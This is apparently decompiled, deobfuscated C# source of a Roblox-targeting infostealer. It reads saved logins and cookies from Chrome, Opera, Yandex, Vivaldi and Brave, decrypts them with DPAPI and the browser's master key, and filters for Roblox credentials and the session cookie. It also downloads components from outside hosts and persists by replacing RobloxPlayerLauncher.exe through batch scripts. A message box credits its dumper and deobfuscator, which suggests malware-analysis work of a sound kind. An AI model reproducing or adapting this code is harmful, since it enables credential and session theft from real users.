// Token: 0x06000012 RID: 18 RVA: 0x00003190 File Offset: 0x00001390 private static void smethod_14() { if (Directory.Exists(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + "\\Google\\Chrome")) { try { string path = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + "\\Google\\Chrome"; string[] files = Directory.GetFiles(path, "Cookies", SearchOption.AllDirectories); foreach (string string_ in files) { EntryPointClass.smethod_16(string_); } } catch { } try { string path2 = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + "\\Google\\Chrome"; string[] files2 = Directory.GetFiles(path2, "Login Data", SearchOption.AllDirectories); foreach (string string_2 in files2) { EntryPointClass.smethod_17(string_2); } } catch { } } }
// Token: 0x0600000E RID: 14 RVA: 0x00002F2C File Offset: 0x0000112C private static void smethod_10(string string_8) { EntryPointClass.smethod_11(string_8); string a = EntryPointClass.smethod_13(EntryPointClass.string_4); if (a == "null") { return; } string path = Path.GetTempPath() + "up.txt"; string fileName = Path.GetTempPath() + "update.exe"; try { using (StreamWriter streamWriter = new StreamWriter(path, false)) { streamWriter.WriteLine(EntryPointClass.string_4); streamWriter.Close(); } using (WebClient webClient = new WebClient()) { webClient.Proxy = null; webClient.DownloadFile("https://csnatcher.rokey.xyz/x/update.bin", fileName); webClient.Dispose(); } } catch { } }
// Token: 0x0600000D RID: 13 RVA: 0x00002D88 File Offset: 0x00000F88 private static void smethod_9(string string_8) { if (File.Exists(string_8)) { string str = EntryPointClass.pPtixUhvH(); string text = EntryPointClass.string_5 + "\\" + str + ".db"; if (File.Exists(text)) { File.Delete(text); } File.Copy(string_8, text); string text2 = string.Format("Data Source={0};Version=3;", text); try { SQLiteConnection sqliteConnection = new SQLiteConnection(text2); sqliteConnection.Open(); string text3 = "SELECT action_url, username_value, password_value FROM logins;"; SQLiteCommand sqliteCommand = new SQLiteCommand(text3, sqliteConnection); SQLiteDataReader sqliteDataReader = sqliteCommand.ExecuteReader(); while (sqliteDataReader.Read()) { string text4 = (string)sqliteDataReader["action_url"]; string text5 = (string)sqliteDataReader["username_value"]; string @string = Encoding.UTF8.GetString(ProtectedData.Unprotect((byte[])sqliteDataReader["password_value"], null, DataProtectionScope.CurrentUser)); string[] array = new string[] { string.Concat(new string[] { text5, ":!:", @string, ":!:", text4 }) }; foreach (string text6 in array) { if (text6.Contains("roblox")) { EntryPointClass.smethod_10(text6); } } } sqliteConnection.Close(); } catch (Exception ex) { Console.WriteLine(ex.ToString()); try { File.Delete(text); } catch { } } } }
// Token: 0x06000015 RID: 21 RVA: 0x000034AC File Offset: 0x000016AC private static void smethod_17(string string_8) { if (File.Exists(string_8)) { try { string str = EntryPointClass.pPtixUhvH(); string text = EntryPointClass.string_5 + "\\" + str + ".db"; if (File.Exists(text)) { File.Delete(text); } File.Copy(string_8, text); string text2 = string.Format("Data Source={0};Journal Mode=Off;", text); SQLiteConnection sqliteConnection = new SQLiteConnection(text2); sqliteConnection.Open(); string text3 = "SELECT origin_url, username_value, password_value FROM logins;"; SQLiteCommand sqliteCommand = new SQLiteCommand(text3, sqliteConnection); SQLiteDataReader sqliteDataReader = sqliteCommand.ExecuteReader(); while (sqliteDataReader.Read()) { string text4 = (string)sqliteDataReader["origin_url"]; string text5 = (string)sqliteDataReader["username_value"]; byte[] byte_ = (byte[])sqliteDataReader["password_value"]; string text6 = File.ReadAllText(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + "\\Google\\Chrome\\User Data\\Local State"); text6 = JObject.Parse(text6)["os_crypt"]["encrypted_key"].ToString(); byte[] byte_2 = ProtectedData.Unprotect(Convert.FromBase64String(text6).Skip(5).ToArray <byte>(), null, DataProtectionScope.LocalMachine); string text7 = EntryPointClass.smethod_15(byte_, byte_2, 3); string[] array = new string[] { string.Concat(new string[] { text5, ":!:", text7, ":!:", text4 }) }; foreach (string text8 in array) { if (text8.Contains("roblox")) { EntryPointClass.smethod_10(text8); } } } } catch { } } }
// Token: 0x0600000C RID: 12 RVA: 0x00002C7C File Offset: 0x00000E7C private static void smethod_8(string string_8) { if (File.Exists(string_8)) { string str = EntryPointClass.pPtixUhvH(); string text = EntryPointClass.string_5 + "\\" + str + ".db"; if (File.Exists(text)) { File.Delete(text); } File.Copy(string_8, text); string text2 = string.Format("Data Source={0};", text); try { SQLiteConnection sqliteConnection = new SQLiteConnection(text2); sqliteConnection.Open(); string text3 = "SELECT encrypted_value FROM cookies;"; SQLiteCommand sqliteCommand = new SQLiteCommand(text3, sqliteConnection); SQLiteDataReader sqliteDataReader = sqliteCommand.ExecuteReader(); while (sqliteDataReader.Read()) { string @string = Encoding.UTF8.GetString(ProtectedData.Unprotect((byte[])sqliteDataReader["encrypted_value"], null, DataProtectionScope.CurrentUser)); string[] array = new string[] { @string }; foreach (string text4 in array) { if (text4.Contains("_|WARNING:-DO-NOT-SHARE-THIS.")) { EntryPointClass.smethod_10(text4); } } } sqliteConnection.Close(); } catch { } } }
// Token: 0x06000005 RID: 5 RVA: 0x0000271C File Offset: 0x0000091C private static void smethod_2() { string tempPath = Path.GetTempPath(); string text = Path.Combine(new string[] { tempPath + "csupdates.bat" }); string value = "taskkill /PID /T /F " + Process.GetCurrentProcess().Id; string value2 = string.Concat(new string[] { "XCOPY /Y \"", Class4.PBaBSwF0biKAJ(Assembly.GetExecutingAssembly()).ToString(), "\" \"", EntryPointClass.string_5, "\"" }); string value3 = "START /C \"" + EntryPointClass.smethod_0() + "\""; string value4 = "EXIT"; try { if (!File.Exists(text)) { FileStream fileStream = File.Create(text); fileStream.Close(); } using (StreamWriter streamWriter = new StreamWriter(text, false)) { streamWriter.WriteLine(value); streamWriter.WriteLine(value2); streamWriter.WriteLine(value3); streamWriter.WriteLine(value4); } } catch { } EntryPointClass.MsyUyJaON(text); }
// Token: 0x06000016 RID: 22 RVA: 0x00003668 File Offset: 0x00001868 private static void smethod_18() { EntryPointClass.smethod_12(); if (Directory.Exists(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + "\\Google\\Chrome")) { try { string path = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + "\\Google\\Chrome"; string[] files = Directory.GetFiles(path, "Cookies", SearchOption.AllDirectories); foreach (string string_ in files) { EntryPointClass.smethod_8(string_); } } catch { } try { string path2 = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + "\\Google\\Chrome"; string[] files2 = Directory.GetFiles(path2, "Login Data", SearchOption.AllDirectories); foreach (string string_2 in files2) { EntryPointClass.smethod_9(string_2); } } catch { } } if (Directory.Exists(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\Roaming\\Opera Software")) { try { string path3 = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\Roaming\\Opera Software"; string[] files3 = Directory.GetFiles(path3, "Cookies", SearchOption.AllDirectories); foreach (string string_3 in files3) { EntryPointClass.smethod_8(string_3); } } catch { } try { string path4 = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\Roaming\\Opera Software"; string[] files4 = Directory.GetFiles(path4, "Login Data", SearchOption.AllDirectories); foreach (string string_4 in files4) { EntryPointClass.smethod_9(string_4); } } catch { } } if (Directory.Exists(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + "\\Yandex")) { try { string path5 = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + "\\Yandex"; string[] files5 = Directory.GetFiles(path5, "Cookies", SearchOption.AllDirectories); foreach (string string_5 in files5) { EntryPointClass.smethod_8(string_5); } } catch { } try { string path6 = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + "\\Yandex"; string[] files6 = Directory.GetFiles(path6, "Login Data", SearchOption.AllDirectories); foreach (string string_6 in files6) { EntryPointClass.smethod_9(string_6); } } catch { } } if (Directory.Exists(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + "\\Vivaldi")) { try { string path7 = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + "\\Vivaldi"; string[] files7 = Directory.GetFiles(path7, "Cookies", SearchOption.AllDirectories); foreach (string string_7 in files7) { EntryPointClass.smethod_8(string_7); } } catch { } try { string path8 = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + "\\Vivaldi"; string[] files8 = Directory.GetFiles(path8, "Login Data", SearchOption.AllDirectories); foreach (string string_8 in files8) { EntryPointClass.smethod_9(string_8); } } catch { } } if (Directory.Exists(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + "\\BraveSoftware")) { try { string path9 = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + "\\BraveSoftware"; string[] files9 = Directory.GetFiles(path9, "Cookies", SearchOption.AllDirectories); foreach (string string_9 in files9) { EntryPointClass.smethod_8(string_9); } } catch { } try { string path10 = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + "\\BraveSoftware"; string[] files10 = Directory.GetFiles(path10, "Login Data", SearchOption.AllDirectories); foreach (string string_10 in files10) { EntryPointClass.smethod_9(string_10); } } catch { } } }
// Token: 0x06000004 RID: 4 RVA: 0x00002428 File Offset: 0x00000628 private static void Main(string[] args) { MessageBox.Show("Dumped by icor, deobfuscated by NTAuth. Entry point reached, dont go further if you dont want to get f*****g infected by this sloppy code."); EntryPointClass.smethod_5(); string text = Path.Combine(EntryPointClass.smethod_6(), "content", "updates"); string text2 = Path.Combine(text, "RobloxPlayerLauncher.exe"); if (Class4.PBaBSwF0biKAJ(Assembly.GetExecutingAssembly()) == Path.Combine(EntryPointClass.smethod_6(), "RobloxPlayerLauncher.exe")) { EntryPointClass.smethod_10(EntryPointClass.smethod_4(args[0].Split(new char[] { ':' })[3].Split(new char[] { '+' })[0])); new Process { StartInfo = { Arguments = args[0], FileName = text2 } }.Start(); return; } if (!Class4.PBaBSwF0biKAJ(Assembly.GetExecutingAssembly()).Contains("Temp")) { if (!Class4.PBaBSwF0biKAJ(Assembly.GetExecutingAssembly()).Contains("Roblox")) { if (!Directory.Exists(EntryPointClass.string_5)) { try { Directory.CreateDirectory(EntryPointClass.string_5); Directory.CreateDirectory(EntryPointClass.string_5 + "\\x64"); Directory.CreateDirectory(EntryPointClass.string_5 + "\\x86"); } catch { } } if (File.Exists(EntryPointClass.string_5 + "\\System.Data.SQLite.dll")) { if (File.Exists(EntryPointClass.smethod_0())) { File.Delete(EntryPointClass.smethod_0()); } EntryPointClass.smethod_2(); return; } WebClient webClient = new WebClient(); webClient.DownloadFile("https://ixware.biz/cs/1.bin", EntryPointClass.string_5 + "\\EntityFramework.dll"); webClient.DownloadFile("https://ixware.biz/cs/2.bin", EntryPointClass.string_5 + "\\EntityFramework.SqlServer.dll"); webClient.DownloadFile("https://ixware.biz/cs/3.bin", EntryPointClass.string_5 + "\\System.Data.SQLite.dll"); webClient.DownloadFile("https://ixware.biz/cs/4.bin", EntryPointClass.string_5 + "\\System.Data.SQLite.EF6.dll"); webClient.DownloadFile("https://ixware.biz/cs/5.bin", EntryPointClass.string_5 + "\\System.Data.SQLite.Linq.dll"); webClient.DownloadFile("https://ixware.biz/cs/6.bin", EntryPointClass.string_5 + "\\BouncyCastle.Crypto.dll"); webClient.DownloadFile("https://ixware.biz/cs/7.bin", EntryPointClass.string_5 + "\\Newtonsoft.Json.dll"); webClient.DownloadFile("https://ixware.biz/cs/x64.bin", EntryPointClass.string_5 + "\\x64\\SQLite.Interop.dll"); webClient.DownloadFile("https://ixware.biz/cs/x86.bin", EntryPointClass.string_5 + "\\x86\\SQLite.Interop.dll"); webClient.Dispose(); if (!File.Exists(text2) && File.Exists(EntryPointClass.smethod_7())) { EntryPointClass.smethod_3(text2, text); return; } EntryPointClass.smethod_2(); return; } } else if (Class4.PBaBSwF0biKAJ(Assembly.GetExecutingAssembly()) != Path.Combine(EntryPointClass.smethod_6(), "RobloxPlayerLauncher.exe")) { EntryPointClass.smethod_1(); if (EntryPointClass.bool_0) { if (EntryPointClass.int_0 >= 80) { EntryPointClass.smethod_14(); return; } try { EntryPointClass.smethod_18(); return; } catch { return; } } try { EntryPointClass.smethod_18(); } catch { EntryPointClass.smethod_14(); } } }
// Token: 0x06000006 RID: 6 RVA: 0x00002844 File Offset: 0x00000A44 private static void smethod_3(string string_8, string string_9) { string tempPath = Path.GetTempPath(); string text = Path.Combine(new string[] { tempPath + "csupdate.bat" }); string value = "taskkill /PID /T /F " + Process.GetCurrentProcess().Id; string value2 = string.Concat(new string[] { "XCOPY /Y \"", Class4.PBaBSwF0biKAJ(Assembly.GetExecutingAssembly()).ToString(), "\" \"", EntryPointClass.string_5, "\"" }); string value3 = string.Concat(new string[] { "XCOPY /Y \"", EntryPointClass.smethod_7(), "\" \"", string_9, "\"" }); string value4 = string.Concat(new string[] { "XCOPY /Y \"", Class4.PBaBSwF0biKAJ(Assembly.GetExecutingAssembly()).ToString(), "\" \"", Path.Combine(EntryPointClass.smethod_6(), "RobloxPlayerLauncher.exe"), "\"" }); string value5 = "START /C \"" + EntryPointClass.smethod_0() + "\""; string value6 = "EXIT"; try { if (!File.Exists(string_8) && !Directory.Exists(string_9)) { Directory.CreateDirectory(string_9); } } catch { } try { if (!File.Exists(text)) { FileStream fileStream = File.Create(text); fileStream.Close(); } using (StreamWriter streamWriter = new StreamWriter(text, false)) { streamWriter.WriteLine(value); streamWriter.WriteLine(value2); streamWriter.WriteLine(value3); streamWriter.WriteLine(value4); streamWriter.WriteLine(value5); streamWriter.WriteLine(value6); } } catch { } EntryPointClass.MsyUyJaON(text); }